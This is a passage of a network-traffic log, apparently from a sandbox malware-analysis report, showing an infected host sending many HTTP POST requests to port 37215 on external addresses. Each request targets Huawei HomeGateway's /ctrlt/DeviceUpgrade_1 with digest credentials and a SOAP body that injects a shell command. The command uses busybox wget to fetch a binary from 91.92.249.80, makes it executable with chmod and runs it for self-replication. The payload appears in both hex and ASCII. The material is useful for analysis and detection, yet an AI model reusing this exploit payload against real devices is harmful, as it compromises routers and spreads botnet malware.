                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          930192.168.2.2343642111.15.143.2737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267649889 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          931192.168.2.2338260197.79.57.14037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267679930 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          932192.168.2.2345176197.174.43.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267688036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          933192.168.2.2344190197.13.143.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267704010 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          934192.168.2.235286241.71.103.10837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267725945 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          935192.168.2.2347148197.245.229.1637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267726898 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          936192.168.2.2344602197.132.109.4637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267738104 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          937192.168.2.2344078197.113.40.7137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267750978 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          938192.168.2.2333692157.3.204.8837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267786980 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          939192.168.2.2333980105.1.152.637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267812967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
